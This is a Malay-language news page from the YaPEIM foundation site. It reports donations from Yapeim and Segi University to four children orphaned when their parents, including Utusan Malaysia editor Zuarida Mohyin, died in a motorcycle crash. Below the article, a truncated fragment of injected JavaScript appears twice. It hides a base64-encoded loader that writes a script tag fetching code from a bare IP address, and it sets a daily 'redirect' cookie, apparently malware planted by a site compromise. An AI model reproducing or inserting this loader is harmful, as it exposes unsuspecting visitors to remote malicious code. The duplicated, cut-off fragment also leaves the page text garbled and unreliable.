YaPEIM » Yapeim, Segi University Bantu Waris Zuarida

Terkini

Yapeim, Segi University Bantu Waris Zuarida

YaPEIM & Segi University bantu nasib empat anak Pengarang Meja Agama Utusan Malaysia, Zuarida Mohyin.

KUALA LUMPUR 6 Ogos – Nasib empat anak Pengarang Meja Agama Utusan Malaysia, Zuarida Mohyin, 45, yang menjadi yatim piatu dalam sekelip mata terus mendapat perhatian pelbagai pihak yang tampil memberi bantuan.

Nurul Atikah, 17; Nur Aqilah, 16; Nurul Ayra, 14, dan Nur Ain Munirah, 4 yang kehilangan tempat bergantung mereka, hari ini menerima bantuan daripada Yayasan Pembangunan Ekonomi Islam Malaysia (Yapeim) dan Segi University yang prihatin terhadap nasib yang melanda keempat-empat beradik itu.

Presiden Yayasan Pembangunan Ekonomi Islam Malaysia (Yapeim), Datuk Abdul Malik Awang Kechil berkata, sumbangan ikhlas tersebut bertujuan untuk meringankan beban mereka bagi meneruskan persekolahan dah kehidupan harian setelah kehilangan kedua ibu bapa mereka.

Menurut beliau, Yapeim turut menawarkan bantuan pendidikan sehingga tamat belajar kepada keempat-empat beradik yang akan dijadikan ‘anak angkat Yapeim’ menerusi Program Sinar Kasih.

“Yapeim akan memberi bantuan kewangan RM200 seorang setiap bulan selama setahun kepada mereka. Ini bagi meringankan perbelanjaan harian setelah kehilangan tempat bergantung.

“Malah, setiap bulan, Yapeim akan menghantar beberapa orang kakitangan untuk memantau perkembangan mereka dalam memastikan bantuan diterima berterusan,” katanya kepada Utusan Malaysia di sini hari ini.

Keempat-empat beradik itu menjadi yatim piatu setelah motosikal yang dibonceng ibunya, Zuarida terlibat dalam kemalangan maut di Kilometer 435.6 Lebuhraya Utara-Selatan arah utara Khamis lalu.

Kemalangan tersebut turut meragut nyawa suaminya, Mohd. Rozi Mahmud, 43, yang menunggang motosikal setelah dipercayai melanggar belakang sebuah lori yang membawa muatan gelung besi yang bergerak di laluan sama.

Yang turut hadir, Pengurus Besar Sumber Manusia Kumpulan Utusan, Mohd. Nazlan Osman dan Pengarang Berita Kanan 1 Utusan Malaysia, Rozaman Ismail serta Pengurus Besar Bahagian Infrastruktur, Segi University, Roslan Jamil yang turut menyampaikan sumbangan kepada empat beradik tersebut.

Program Sinar Kasih dianjurkan secara bersama oleh Yapeim, Kumpulan Utusan dan RTM.

Sementara itu, Roslan yang juga majikan kepada Allahyarham Mohd. Rozi berkata, sumbangan itu merupakan hasil kutipan derma daripada seluruh warga kerja universiti yang simpati dengan nasib yang melanda keluarga itu.

Mengenali Allahyarham Mohd. Rozi, secara peribadi Roslan berkata, Allahyarham merupakan seorang pekerja yang komited terhadap tugas dan sentiasa melaksanakan kerja yang diberi dengan penuh dedikasi.

“Pihak universiti amat simpati dengan apa yang berlaku terhadap keluarga Allahyarham Mohd. Rozi dan sehubungan itu, kami akan sedaya upaya segera menyelesaikan apa-apa tunggakan termasuk insurans bagi diberikan kepada waris Allahyarham,” katanya. – Utusan

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top